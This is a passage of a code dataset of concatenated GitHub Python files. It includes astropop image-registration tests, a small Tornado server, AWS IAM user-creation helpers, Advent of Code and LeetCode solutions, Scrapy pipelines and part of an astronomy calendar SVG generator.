compute_shift_list(frame_list, algorithm='asterism-matching')\r\n\r\n def test_register_framedata_list_skip_failure_false(self):\r\n frame_list = self.gen_frame_list((512, 1024))\r\n frame_list[2].data = np.ones((1024, 512))\r\n\r\n with pytest.raises(ValueError):\r\n register_framedata_list(frame_list, algorithm='asterism-matching',\r\n skip_failure=False)\r\n\r\n with pytest.raises(ValueError):\r\n compute_shift_list(frame_list, algorithm='asterism-matching',\r\n skip_failure=False)\r\n\r\n @pytest.mark.parametrize('cval,expct_cval', [(np.nan, np.nan),\r\n ('median', 1),\r\n ('mean', 1),\r\n (0, 0)])\r\n def test_register_framedata_list_skip_failure_true(self, cval, expct_cval):\r\n frame_list = self.gen_frame_list((512, 1024))\r\n frame_list[2].data = np.ones((1024, 512))\r\n\r\n reg_list = register_framedata_list(frame_list, clip_output=True,\r\n inplace=False,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5,\r\n cval=cval,\r\n skip_failure=True)\r\n\r\n assert_equal(len(frame_list), len(reg_list))\r\n assert_is_none(reg_list[2].meta['astropop registration_shift_x'])\r\n assert_is_none(reg_list[2].meta['astropop registration_shift_y'])\r\n assert_is_none(reg_list[2].meta['astropop registration_rot'])\r\n assert_equal(reg_list[2].meta['astropop registration'], 'failed')\r\n assert_equal(reg_list[2].data, np.full(reg_list[2].shape, expct_cval))\r\n assert_true(np.all(reg_list[2].mask))\r\n\r\n for org, reg in zip(frame_list, reg_list):\r\n assert_equal(reg.meta['astropop trimmed_section'], '6:-3,2:-23')\r\n # x: 6:-3, y: 2:-23, since frame[2] is not available\r\n assert_equal(reg.shape, (1024-23-2, 512-6-3))\r\n\r\n shift_list = compute_shift_list(frame_list,\r\n algorithm='asterism-matching',\r\n max_control_points=30,\r\n detection_threshold=5,\r\n skip_failure=True)\r\n shift_list_expt = np.array(self._shifts)\r\n shift_list_expt[2][:] = np.nan\r\n assert_almost_equal(shift_list, shift_list_expt, decimal=1)\r\n","repo_name":"juliotux/astropop","sub_path":"tests/test_image_register.py","file_name":"test_image_register.py","file_ext":"py","file_size_in_byte":20662,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"86"} +{"seq_id":"73759553244","text":"## pip3 install tornado\n\nimport tornado.ioloop\nimport tornado.web\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n self.write(\"下面是\" + self.get_argument('id') + \"的年度图书报告:123123123123123\")\n\napplication = tornado.web.Application([\n (r\"/library_annual_report/query\", MainHandler),\n])\n\nif __name__ == \"__main__\":\n application.listen(8080)\n tornado.ioloop.IOLoop.instance().start()\n","repo_name":"chuqingq/codeeveryday","sub_path":"python/20180304_wq_library_annual_report/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"26735212904","text":"class Solution:\n def getHint(self, secret: str, guess: str) -> str:\n countA = countB = 0\n dic = defaultdict(int)\n # store the secret to dic and calculate countA\n for i in range(len(secret)):\n if secret[i] == guess[i]:\n countA += 1\n dic[secret[i]] += 1\n # compare the guess with the secret and calculate countB\n for c in guess:\n if c in dic and dic[c] > 0:\n dic[c] -= 1\n countB += 1\n # don't forget to minus countA\n countB -= countA\n return str(countA) + \"A\" + str(countB) + \"B\"\n 
","repo_name":"BSanandu88/Coding-questions","sub_path":"299-bulls-and-cows/299-bulls-and-cows.py","file_name":"299-bulls-and-cows.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"40146498362","text":"'''\nAuthor : Thyssen Wen\nDate : 2022-11-19 14:41:52\nLastEditors : Thyssen Wen\nLastEditTime : 2022-11-21 13:15:37\nDescription : file content\nFilePath : /SVTAS/svtas/model/necks/unsample_decoder_neck.py\n'''\nimport torch\nimport copy\nimport random\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom mmcv.cnn import constant_init, kaiming_init\nfrom ..builder import NECKS\n\nclass Adaptive3DTo1DPooling(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n\n def forward(self, x):\n # x [N C T H W]\n _, c, t, _, _ = x.shape\n return F.adaptive_avg_pool3d(x, [t, 1, 1]).squeeze(-1).squeeze(-1)\n\nclass Up1DConv(nn.Module):\n def __init__(self, in_channel, reduce_factor=2) -> None:\n super().__init__()\n self.up = nn.Upsample(scale_factor = 2)\n self.conv = nn.Sequential(\n nn.Conv1d(in_channel, in_channel // reduce_factor, 3, padding=1, dilation=1),\n nn.ReLU(),\n # nn.Conv1d(in_channel // reduce_factor, in_channel // reduce_factor, 3, padding=2, dilation=2),\n # nn.ReLU(),\n nn.BatchNorm1d(in_channel // 2))\n self.pool = Adaptive3DTo1DPooling()\n \n def forward(self, x1, x2):\n x1 = self.up(x1)\n x2 = self.pool(x2)\n x = torch.cat([x1, x2], dim=1)\n x = self.conv(x)\n return x\n\n@NECKS.register()\nclass UnsampleDecoderNeck(nn.Module):\n def __init__(self,\n in_channels_list=[3072, 2048, 1280],\n reduce_factor=2) -> None:\n super().__init__()\n self.layers = nn.ModuleList([\n Up1DConv(in_channel=in_channel, reduce_factor=reduce_factor)\n for in_channel in in_channels_list\n ])\n self.pool = Adaptive3DTo1DPooling()\n \n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv1d) or isinstance(m, nn.Conv2d):\n kaiming_init(m)\n\n def _clear_memory_buffer(self):\n pass\n\n def forward(self, x, masks):\n x_out = self.pool(x[len(x) - 1])\n for i, layer in zip(range(len(x) - 1), self.layers):\n x_out = layer(x_out, x[len(x) - 2 - i])\n return x_out * masks","repo_name":"Thinksky5124/SVTAS","sub_path":"svtas/model/necks/unsample_decoder_neck.py","file_name":"unsample_decoder_neck.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"86"} +{"seq_id":"6440098963","text":"from user_interface import temperature_view # импортируем методы(чтобы не использ библиотеки) из модуля user_interface\r\nfrom user_interface import wind_speed_view\r\nfrom user_interface import pressure_view\r\n\r\ndef create(device = 1): # метод получает в аргументе device = 1(в качетсве демонстрации,\r\n # т/е из первого девайса берется значение)\r\n style = 'style=\"font-size:30px;\"' # стиль в конечном html представлении шрифт 30\r\n html = '\\n \\n \\n' # заготовка для html представления\r\n html += '
<p {}>Temperature: {} c</p>\\n'\\\r\n        .format(style, temperature_view(device)) # обычная строка, которая форматируется: в качестве температуры мы вставляем значение этой темп-ры, полученное из view\r\n    html += '<p {}>Wind_speed: {} m/s</p>\\n'\\\r\n        .format(style, wind_speed_view(device))\r\n    html += '<p {}>Pressure: {} mmHg</p>\\n'\\\r\n        .format(style, pressure_view(device))\r\n    html += ' \\n'\r\n    \r\n    with open('index.html', 'w') as page: # создаем файл index.html\r\n        page.write(html) # сохраняем файл index.html\r\n\r\n    return html\r\n\r\n\r\n\r\ndef new_create(data ,device = 1): # создадим метод получения трех измерений в html представлении, доп аргумент data \r\n    t, p, w = data # данные о темп давл и скор ветра \r\n    style = 'style=\"font-size:30px;\"'\r\n    html = '\\n \\n \\n'\r\n    html += '<p {}>Temperature: {} c</p>\\n'\\\r\n        .format(style, t) # вместо явного вызова метода temperature_view указываем t\r\n    html += '<p {}>Wind_speed: {} m/s</p>\\n'\\\r\n        .format(style, w)\r\n    html += '<p {}>Pressure: {} mmHg</p>
\\n'\\\r\n .format(style, p)\r\n html += ' \\n'\r\n \r\n with open('new_index.html', 'w') as page:\r\n page.write(html)\r\n\r\n return data # возвращаем данные (флюид интерфейс)","repo_name":"ElenaFat918/pythonapp","sub_path":"pythonapp/join_job/html_creater.py","file_name":"html_creater.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"86360874378","text":"import logging\nimport json\nfrom logging.config import fileConfig\nfrom botocore.exceptions import ClientError\n\nfileConfig('logging_config.ini')\nlogger = logging.getLogger()\ntags = [{'Key': 'IsWork','Value': 'true'},{'Key': 'WorkType','Value': 'customer360'}]\n\n\ndef iam_create_user(client, user, override=False):\n try:\n client.create_user(\n UserName=user['username'],\n Tags=tags)\n logger.info('User: {username} has been created'.format(username=user['username']))\n print(user['username'])\n #user_aws = client.get_user(UserName=user['username'])\n client.create_login_profile(\n Password=user['password'],\n PasswordResetRequired=False,\n UserName=user['username']\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'EntityAlreadyExists':\n if not (override):\n logger.info('User: {username} already exist and override flag is: {override}'.format(username=user['username'], override=override)) \n else:\n logger.info('User: {username} already exist but override flag is: {override}. User will be re-created. NOT IMPLEMENTED'.format(username=user['username'], override=override))\n else:\n logger.info('Unhandled error. Please check your code.')\n raise e\n client.add_user_to_group(\n GroupName=user['Group'],\n UserName=user['username']\n )\n\ndef iam_create_group(client, group):\n try:\n group = client.create_group(\n Path=\"/\",\n GroupName=group\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'EntityAlreadyExists':\n logger.info('Group: {g} already exist. Will skip the group creation step'.format(g=group)) \n else:\n logger.info('Unhandled error when creating group. 
Please check your code.')\n raise e\n ","repo_name":"alesabater/customer360","sub_path":"source/users/manager_user.py","file_name":"manager_user.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17580405894","text":"#!/usr/bin/python3\n# Advent of code 2020 day 14\n# See https://adventofcode.com/2020/day/14\nimport re\n\nwith open(\"input.txt\") as f:\n lines = f.readlines()\n\n\ndef load_mask(mask):\n mask_or = 0\n mask_and = pow(2, 36)-1\n for i, c in enumerate(reversed(mask)):\n bit = pow(2, i)\n if c == '0':\n mask_and -= bit\n elif c == '1':\n mask_or += bit\n return mask_or, mask_and\n\n\ndef part1():\n mask = load_mask('X' * 36)\n memory = {}\n for line in lines:\n match1 = re.fullmatch(r\"mask = (.*)\", line.strip())\n match2 = re.fullmatch(r\"mem\\[(\\d+)] = (\\d+)\", line.strip())\n if match1:\n mask = load_mask(match1.group(1))\n elif match2:\n addr, val = match2.groups()\n masked_val = (int(val) | mask[0]) & mask[1]\n memory[addr] = masked_val\n\n print(sum(memory.values()))\n\n\ndef list_values(value, mask):\n results = []\n result_count = pow(2, len([c for c in mask if c == 'X']))\n for i in range(0, result_count):\n x_bit = 0\n result = []\n for bit in range(0, len(value)):\n digit = '0'\n if mask[bit] == 'X':\n if i & pow(2, x_bit):\n digit = '1'\n x_bit += 1\n elif value[bit] == '1' or mask[bit] == '1':\n digit = '1'\n result.append(digit)\n results.append(\"\".join(result))\n\n return results\n\n\ndef part2():\n mask = 'X' * 36\n memory = {}\n for line in lines:\n match1 = re.fullmatch(r\"mask = (.*)\", line.strip())\n match2 = re.fullmatch(r\"mem\\[(\\d+)] = (\\d+)\", line.strip())\n if match1:\n mask = match1.group(1)\n elif match2:\n addr, val = match2.groups()\n binary_addr = format(int(addr), \"036b\")\n masked_addrs = list_values(binary_addr, mask)\n for masked_addr in masked_addrs:\n memory[masked_addr] = int(val)\n\n print(sum(memory.values()))\n\n\npart1()\npart2()\n","repo_name":"chrisglencross/advent-of-code","sub_path":"aoc2020/day14/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"39476989702","text":"import time\nimport random\n\nlenarr = [40, 400, 4000, 20000]\n\nfor i in range(4):\n\tn = lenarr[i]\n\trandom.seed(100)\n\tarray1 = random.sample(range(2*n + 1), n)\n\tarray2 = random.sample(range(2*n + 1), n)\n\ttarget = n*1.5\n\n\tdef mergesort(arr, i, j):\n\t\tif i > j:\n\t\t\treturn\n\n\t\tif i == j:\n\t\t\treturn [arr[i]]\n\n\t\tmid = (i + j)//2\n\n\t\tx = mergesort(arr, i, mid)\n\t\ty = mergesort(arr, mid + 1, j)\n\n\t\ttemparr = merge(x, y)\n\n\t\treturn temparr\n\n\tdef merge(arr1, arr2):\n\t\ttemparr = []\n\t\tl1 = 0\n\t\tl2 = 0\n\n\t\twhile l1 < len(arr1) and l2 < len(arr2):\n\t\t\tif arr1[l1] <= arr2[l2]:\n\t\t\t\ttemparr.append(arr1[l1])\n\t\t\t\tl1 += 1\n\n\t\t\telse :\n\t\t\t\ttemparr.append(arr2[l2])\n\t\t\t\tl2 += 1\n\n\t\twhile l1 < len(arr1):\n\t\t\ttemparr.append(arr1[l1])\n\t\t\tl1 += 1\n\n\t\twhile l2 < len(arr2):\n\t\t\ttemparr.append(arr2[l2])\n\t\t\tl2 += 1\n\n\t\treturn temparr\n\n\tdef getactualindex(arr, startingidx, pointer):\n\t\tcount = 0\n\t\tfor i in range(startingidx + 1):\n\t\t\tif arr[i] <= arr[pointer]:\n\t\t\t\tcount += 1\n\n\t\t\telse :\n\t\t\t\tbreak\n\n\t\treturn count\n\n\tdef insertionsort(arr):\n\t\tstartingidx = 0\n\t\twhile startingidx < len(arr) - 1:\n\t\t\tpointer = startingidx 
+ 1\n\t\t\tidx = getactualindex(arr, startingidx, pointer)\n\t\t\ttemp = pointer - 1\n\t\t\twhile temp >= idx :\n\t\t\t\tarr[temp], arr[temp + 1] = arr[temp + 1], arr[temp]\n\t\t\t\ttemp -= 1\n\n\t\t\tstartingidx += 1\n\n\t\treturn arr \n\n\tst_insertion = time.time()\n\tinsertionsort(array1)\n\tend_insertion = time.time()\n\tprint('Time taken by insertion sort :', end_insertion - st_insertion)\n\tst_merge = time.time()\n\tmergesort(array2, 0, len(array2) - 1)\n\tend_merge = time.time()\n\tprint('Time taken by merge sort :', end_merge - st_merge)\n\n\tdef binarysearch(arr, l, r, target):\n\t\twhile l <= r :\n\t\t\tmid = (l + r)//2\n\n\t\t\tif arr[mid] == target :\n\t\t\t\tprint(mid)\n\t\t\t\treturn \n\n\t\t\telif arr[mid] > target :\n\t\t\t\tr = mid - 1\n\n\t\t\telse :\n\t\t\t\tl = mid + 1\n\n\t\tprint(\"This element can not be found\")\n\t\t\n\n\tdef linersearch(arr, target):\n\t\tfor i in range(len(arr)):\n\t\t\tif arr[i] == target :\n\t\t\t\tprint(i)\n\t\t\t\treturn \n\n\t\tprint(\"This element can not be found\")\n\n\t\t\t\n\tst_linear = time.time()\n\tlinersearch(array1, target)\n\tend_linear = time.time()\n\tprint(\"Time taken by linear search :\", end_linear - st_linear)\n\n\tst_binary = time.time()\n\tbinarysearch(array2,0 , len(array2)-1, target)\n\tend_merge = time.time()\n\n\tprint(\"Time taken by the binary search\", end_merge - st_merge)\n\n\n","repo_name":"cynic-8122/DSA-in-Python","sub_path":"ADA Surprise test/mergesortandinsertionsort.py","file_name":"mergesortandinsertionsort.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71014423643","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\nfrom urllib.request import urlopen\nimport re\nimport os\nfrom .settings import PIC_DIRECTORY\n\nclass CleanInfoPipeline():\n def process_item(self, item, spider):\n if spider.name == 'itao_supply' and item['info']:\n for index, field in enumerate(item['info']):\n if '\\t' in field or '\\r' in field or '\\n' in field:\n item['info'][index] = re.sub('[\\t\\n\\r]','',field)\n item['info'][index] = re.sub('[\\t\\n\\r]', '', field)\n return item\n\n\nclass DownloadPicsPipeline():\n def process_item(self, item, spider):\n if spider.name == 'itao_supply':\n self.download_pic(item['pictures'], item['barcode2D'])\n return item\n\n def download_pic(self, urls, code):\n dir = PIC_DIRECTORY + code\n os.mkdir(dir)\n for index, url in enumerate(urls):\n print('正在下载图片: {}_{}'.format(code,index))\n pic_name = '{0}/pic_{1}.{2}'.format(dir, index, 'jpg')\n content = urlopen(url).read()\n with open(pic_name, 'wb') as f:\n f.write(content)\n\n\nclass MongoPipeline(object):\n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DB')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n\n def process_item(self, item, spider):\n name = item.__class__.__name__\n self.db[name].insert(dict(item))\n return item\n\n def close_spider(self, spider):\n 
self.client.close()\n","repo_name":"JayWu7/Economic-Forest-Information-Recommendation-System","sub_path":"crawls/crawls/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"36178651577","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport calendar\nfrom subprocess import run\nimport datetime\nimport dateutil.parser\nfrom math import ceil\nfrom pytz import timezone\n\nfrom lunardate import LunarDate\n\nfrom skyfield.api import load, Topos\nfrom skyfield.units import Angle\nfrom skyfield.earthlib import sidereal_time\n\nfrom _svgnode import *\nfrom _calendar import listDates\nfrom save_calculations import cached, CalculationResults, getCached\n\nfrom diagram_of_planets import DiagramOfPlanets\n\n\nobjects = load(\"de421.bsp\")\nsun = objects[\"Sun\"]\nearth = objects[\"Earth\"]\ntimescale = load.timescale()\n\n\nconvertSign = lambda i: \"\" if i >= 0 else \"-\"\n\ndef convertHM(ra):\n sign, h, m, _ = ra.signed_hms()\n return \"%s%dh\" % (convertSign(sign), h) +\\\n \"%02dm\" % m \n\ndef convertHMS(ra):\n sign, h, m, s = ra.signed_hms()\n return \"%s%dh\" % (convertSign(sign), h) +\\\n \"%02dm\" % m +\\\n \"%02ds\" % s\n\ndef convertDeg(deg):\n sign, d, m, _ = deg.signed_dms()\n return \"%s%d°%02d'\"\\\n % (convertSign(sign), d, m)\n\ndef convertSidereal(sr):\n sign, _, m, s = sr.signed_hms()\n return \"%s%dm\" % (convertSign(sign), m) +\\\n \"%02ds\" % s\n\n\n\n \n\n\n\ndef svgTable(\n table, headers,\n fontsize=10, lineheight=1.6, headerwidth=1.37\n):\n\n g = SVGNode(\"g\")\n\n headerWidth = [\n len(header) * fontsize * headerwidth \n for header in headers\n ]\n\n text = lambda x, y, l: SVGNode(\"text\", **{\n \"x\": x,\n \"y\": y,\n# \"textLength\": l,\n \"class\": \"common\",\n# \"lengthAdjust\": \"spacingAndGlyphs\"\n# \"text-anchor\": \"middle\",\n })\n\n x, y = 0, 0\n for i in range(0, len(headers)):\n n = text(x,y, headerWidth[i]).append(headers[i])\n n.attrs[\"class\"] += \" table-header\"\n g.append(n)\n x += headerWidth[i]\n y += fontsize * lineheight \n\n for row in table:\n x = 0\n for i in range(0, len(row)):\n n = text(x,y, headerWidth[i]).append(row[i])\n n.attrs[\"class\"] += \" table-cell\"\n if i == 0: n.attrs[\"class\"] += \" table-first-cell\"\n g.append(n)\n x += headerWidth[i]\n y += fontsize * lineheight\n\n return g\n \n\n\n\nclass MonthGenerator:\n\n DEFS = \"\"\"\n \n \n \n \"\"\"\n\n STYLE = \"\"\"\n .table-first-cell{\n text-align: right;\n }\n .red{ fill: red; }\n .sup{ font-size: 6pt; fill: red; }\n .common,.table-cell,.table-header{\n font-family: NotoMono, monospace;\n font-size: 7pt;\n fill: black;\n white-space: pre;\n z-index:1000;\n }\n .title{\n font-family: serif;\n font-weight: bold;\n font-size: 15pt;\n fill: black;\n z-index:1000;\n }\n .cheatsheet{\n font-size:30pt; font-family:sans; font-weight:bold;\n fill: white;\n }\n \"\"\"\n\n PAGE_SIZE = (1052, 744)\n ANCHOR_TOP_LEFT = (30, 30)\n ANCHOR_MIDDLE_LEFT = (30, 520)\n ANCHOR_BOTTOM_LEFT = (30, 630)\n\n\n def __stripSVG(self, svgtext):\n lines = svgtext.split(\"\\n\")\n found = False\n ret = []\n for line in lines:\n if not found and \"%s\" % self.STYLE)\n self.back.append(self.DEFS).append(\"\" % self.STYLE)\n self.decoratePage(self.front, withFigure=(tableECols <= 4))\n self.decoratePage(self.back, withFigure=False)\n\n # front page\n\n self.front.append(table1).append(tableE)\n\n x, y = self.ANCHOR_MIDDLE_LEFT \n for day in [1, 9, 17, 25, 
self.monthLastDay]:\n self._tableOfPlanets(day)\\\n .attr(\"transform\", \"translate(%d %d)\" % (x, y))\\\n .appendTo(self.front)\n x += 180\n\n # back page\n\n self.back.append(table2)\n\n SVGNode(\n \"g\",\n transform=\"translate(%d %d) scale(0.9 0.9)\" % (\n 415,\n self.ANCHOR_MIDDLE_LEFT[1] - 25 \n )\n ).append(\n self.__stripSVG(self.diagramOfPlanets.hourAngleDiagram())\n ).appendTo(self.back)\n\n SVGNode(\n \"g\",\n transform=\"translate(%d %d) scale(0.9 0.9)\" % (\n self.ANCHOR_MIDDLE_LEFT[0] - 10,\n self.ANCHOR_MIDDLE_LEFT[1] - 25\n )\n ).append(\n self.__stripSVG(self.diagramOfPlanets.decDiagram())\n ).appendTo(self.back)\n\n def _addCheatsheet(self, page):\n # write formula onto background in white\n def addtext(x, y, r, text):\n g = SVGNode(\"g\", transform=\"translate(%d %d) rotate(%d)\" % (x,y,r))\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": \"0\",\n \"class\": \"cheatsheet\",\n \"text-anchor\": \"left\",\n }).append(text).appendTo(g)\n g.appendTo(page)\n\n addtext(100, 400, -60, \"时差=视太阳时-平太阳时\")\n addtext(120, 700, -70, \"当地恒星时=格林尼治恒星时+经度\")\n addtext(800, 200, 80, \"经度差1度=时间差4分钟\")\n\n\n def decoratePage(self, page, withFigure=True):\n SVGNode(\"rect\", \n x=0, y=0, width=\"100%\", height=\"100%\",\n fill=\"#DFDFDF\"\n ).appendTo(page)\n\n SVGNode(\"text\", **{\n \"x\": \"50%\",\n \"y\": \"55%\",\n \"style\": \"font-size:300pt; font-family:sans; font-weight:bold\",\n \"fill\": \"white\",\n \"text-anchor\": \"middle\",\n }).append( str(self.month) ).appendTo(page)\n\n SVGNode(\"text\", **{\n \"x\": \"50%\",\n \"y\": \"80%\",\n \"style\": \"font-size:150pt; font-family:sans; font-weight:bold\",\n \"fill\": \"white\",\n \"text-anchor\": \"middle\",\n }).append( str(self.year) ).appendTo(page)\n\n self._addCheatsheet(page)\n\n logo = SVGNode(\"g\", transform=\"translate(965 720)\").append(\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": \"0\", \"class\": \"title\",\n \"text-anchor\": \"left\",\n \"transform\": \"rotate(-90)\"\n }).append( \"%04d年%02d月\" % (self.year, self.month) )\n ).append(\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": \"20\", \"class\": \"title\",\n \"text-anchor\": \"left\",\n \"transform\": \"rotate(-90)\"\n }).append( \"天文普及月历\" )\n ).append(\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": 40,\n \"text-anchor\": \"left\",\n \"transform\": \"rotate(-90)\",\n }).append(\"采用本初子午圈. 
所有时刻为UTC.\")\n ).append(\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": 55,\n \"text-anchor\": \"left\",\n \"transform\": \"rotate(-90)\",\n }).append(\"作者: NeoAtlantis\")\n )\n logo.appendTo(page)\n\n if withFigure:\n SVGNode(\"g\",\n transform=\"translate(%d %d) scale(0.4 0.4)\" % (\n 720, self.ANCHOR_BOTTOM_LEFT[1] - 15 \n )\n ).append(self.fig1).appendTo(page)\n\n\n\n def _tableOfPlanets(self, day):\n headers = [\"%02d日\" % day, \"视赤经\", \"视赤纬\", \"视黄经\"]\n items = [\n (\"Mercury\", \"水星\"),\n (\"Venus\", \"金星\"),\n (\"Mars\", \"火星\"),\n (\"Jupiter\", \"木星\"),\n (\"Saturn\", \"土星\"),\n (\"Uranus\", \"天王星\"),\n (\"Neptune\", \"海王星\"),\n ]\n data = []\n for planetName, planetTranslation in items:\n src = self.calculationResults[\"planets\"][planetName][self.month][day]\n data.append([\n planetTranslation,\n convertHM( Angle(hours=src[\"ra\"]) ),\n convertDeg( Angle(degrees=src[\"dec\"]) ),\n convertDeg( Angle(degrees=src[\"ecllon\"]) ),\n ])\n\n \n table = svgTable(\n data, headers,\n fontsize=7, lineheight=1.7, headerwidth=1.9\n )\n return table \n\n\n\n def _tableOfEvents(self, start, end):\n node = SVGNode(\"g\")\n data = []\n x = 0\n y = 0\n count = 0\n MAXROWS = 10 \n COLWIDTH = 180\n for each in self.calculationResults[\"events\"][self.month-1]:\n day = int(each[1])\n if not (start <= day <= end): continue\n count += 1\n n = SVGNode(\"text\", **{\n \"x\": x,\n \"y\": y,\n \"class\": \"common\"\n }).append(\"%02d日 %s %s\" % (\n day, each[2], each[3]\n ))\n node.append(n)\n y += 10\n if count % MAXROWS == 0:\n y = 0\n x += COLWIDTH\n return node, ceil(count / MAXROWS)\n\n\n def _tableOfMonth(self, start, end):\n data = []\n row1, row2 = self._rowSubcalendar(start, end)\n data.append([\"\"] + row1)\n data.append([\"\"] + row2)\n #data.append([\"农历\"] + list(self._rowLunarDate(start, end)))\n #data.append([\"月相\"] + list(self._rowMoonPhase(start, end)))\n \n data.append([\" \"])\n data.append([\"UTC=0h..儒略日\"] + list(self._rowJulian(start, end)))\n data.append([\"........恒星时\"] + list(self._rowSidereal(start, end)))\n for e in self._rowsSun(start,end): data.append(e)\n \n\n data.append([\" \"])\n for e in self._rowsRiseset(start, end): data.append(e)\n\n headers = [\" \" * 8]\n for i in range(start, end+1):\n dt = datetime.datetime(self.year, self.month, i)\n weekday = \"一二三四五六日\"[dt.weekday()]\n headers.append(\"%02d (%s)\" % (i, weekday))\n\n table = svgTable(data, headers, fontsize=7, lineheight=1.7)\n return table \n\n def _rowSubcalendar(self, start, end):\n solartermTable = {}\n solarterms = self.calculationResults[\"solarterms\"][\"solarterms-iso\"]\n UTC = timezone(\"UTC\") \n for solartermName in solarterms:\n stDatetime = dateutil.parser\\\n .parse(solarterms[solartermName]).astimezone(UTC)\n solartermTable[(stDatetime.month, stDatetime.day)] = (\n solartermName,\n stDatetime\n )\n moondata = self.calculationResults[\"moonphase\"][self.month]\n\n row1, row2 = [], []\n # row1: by default lunar dates\n for day in range(start, end+1):\n ld = LunarDate.fromSolarDate(self.year, self.month, day)\n ldMonth = \"正二三四五六七八九十冬腊\"[ld.month-1] + \"月\"\n if ld.isLeapMonth:\n ldMonth = \"闰\" + ldMonth\n if ld.day <= 10:\n ldDay = \"初\" + \"一二三四五六七八九十\"[ld.day-1]\n elif ld.day < 20:\n ldDay = \"十\" + \"一二三四五六七八九\"[ld.day-11]\n elif ld.day == 20:\n ldDay = \"二十\"\n elif ld.day < 30:\n ldDay = \"廿\" + \"一二三四五六七八九\"[ld.day-21]\n elif ld.day == 30:\n ldDay = \"三十\"\n row1.append( ldMonth + ldDay )\n # row2: by default solarterm or moon phase\n display = lambda x, y: x + y.rjust(7-len(x), \" \")\n 
for day in range(start, end+1):\n displaySolarterm = None\n if (self.month, day) in solartermTable:\n st = solartermTable[(self.month, day)]\n displaySolarterm = display(st[0], st[1].strftime(\"%H%M\"))\n displayMoonPhase = None\n if moondata[day][\"phase\"]:\n displayMoonPhase = moondata[day][\"phase\"].replace(\":\", \"\")\n displayMoonPhase = displayMoonPhase.split(\" \")\n displayMoonPhase.reverse()\n displayMoonPhase = display(*displayMoonPhase)\n if not displaySolarterm and not displayMoonPhase:\n row2.append(\" \")\n elif bool(displaySolarterm) ^ bool(displayMoonPhase):\n row2.append(displaySolarterm or displayMoonPhase)\n else:\n row2.append(displayMoonPhase)\n row1[len(row2) - 1] = displaySolarterm\n return row1, row2\n\n\n def _rowJulian(self, start, end):\n for day in range(start, end+1):\n utc0 = timescale.ut1(self.year, self.month, day, 0, 0, 0)\n yield \"%.1f\" % utc0.tt\n\n def _rowSidereal(self, start, end):\n for day in range(start, end+1):\n utc0 = timescale.ut1(self.year, self.month, day, 0, 0, 0)\n yield convertHMS(Angle(hours=sidereal_time(utc0)))\n\n def _rowsSun(self, start, end):\n retRA, retDEC = [\"....太阳 视赤经\"], [\"........视赤纬\"]\n retEcllon, retEq = [\"........视黄经\"], [\"........均时差\"]\n\n for day in range(start, end+1):\n tdb0 = timescale.tdb(self.year, self.month, day, 0, 0, 0)\n tt0 = timescale.tt(self.year, self.month, day, 0, 0, 0)\n utc0 = timescale.utc(self.year, self.month, day, 0, 0, 0)\n ut10 = timescale.ut1(self.year, self.month, day, 0, 0, 0)\n\n astrometric = earth.at(tdb0).observe(sun).apparent()\n ra, dec, distance = astrometric.radec(epoch='date')\n ecllat, ecllon, _ = astrometric.ecliptic_latlon(epoch='date')\n\n equation_of_time = sidereal_time(ut10) - ra.hours + 12\n if equation_of_time > 1: equation_of_time -= 24\n\n retRA.append( convertHM(ra) )\n retDEC.append( convertDeg(dec) )\n retEcllon.append( convertDeg(ecllon) )\n retEq.append( convertSidereal(Angle(hours=equation_of_time)) )\n \n return [retEq, retRA, retDEC, retEcllon]\n\n def _rowsRiseset(self, start, end):\n moondata = self.calculationResults[\"moonphase\"][self.month]\n sundata = self.calculationResults[\"sunriseset\"][-0.8333][self.month]\n ctwidata = self.calculationResults[\"sunriseset\"][-6][self.month]\n atwidata = self.calculationResults[\"sunriseset\"][-18][self.month]\n\n ret = []\n for lat in [20, 30, 35, 40, 45, 50]:\n retSun = [\"%02dN...日出日没\" % lat]\n retCTwi = [\"...民用晨昏蒙影\"]\n retATwi = [\"...天文晨昏蒙影\"]\n retMoon = [\"......月出月没\"]\n merge = 